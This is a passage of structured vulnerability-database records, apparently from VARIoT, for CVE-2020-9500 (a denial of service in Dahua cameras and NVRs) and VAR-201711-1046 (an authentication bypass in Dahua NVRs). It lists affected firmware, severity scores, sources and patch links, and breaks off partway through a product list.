                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          }
        ]
      },
      "cve": "CVE-2020-9500",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 4.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 5.0,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003799",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "MULTIPLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.4,
                "id": "CNVD-2020-22980",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:M/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 1.2,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003799",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2020-9500",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003799",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22980",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202004-554",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera. \n\r\n\r\nThere are security holes in many Dahua products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-9500",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "id": "VAR-202004-1824",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:28:09.084000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "DHCC-SA-202004-001",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
          },
          {
            "title": "Patch for Multiple Dahua product input verification error vulnerabilities (CNVD-2020-22980)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/213933"
          },
          {
            "title": "Multiple Dahua Product input verification error vulnerability fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115747"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9500"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9500"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "date": "2020-04-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "date": "2020-04-09T14:15:13.260000",
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "date": "2020-04-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-05-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22980"
          },
          {
            "date": "2020-04-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          },
          {
            "date": "2021-07-21T11:39:23.747000",
            "db": "NVD",
            "id": "CVE-2020-9500"
          },
          {
            "date": "2020-05-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua Input verification vulnerability in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003799"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-554"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201711-1046

    Vulnerability from variot - Updated: 2023-12-18 13:24

    Authentication vulnerability found in Dahua NVR models NVR50XX, NVR52XX, NVR54XX, NVR58XX with software before DH_NVR5xxx_Eng_P_V2.616.0000.0.R.20171102. Attacker could exploit this vulnerability to gain access to additional operations by means of forging json message. Dahua NVR The model software contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaNVR50XX and so on are all Dahua's network hard disk camera products. There are security vulnerabilities in several Dahua products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-1046",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "nvr5232-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5216-8p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5224-24p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5224_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5432-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5416-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5232-8p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5216-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5208-8p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5832-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5208-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5832-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5816-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5816-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5216-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5464-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5232-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5416-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5864-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5432-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5464-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
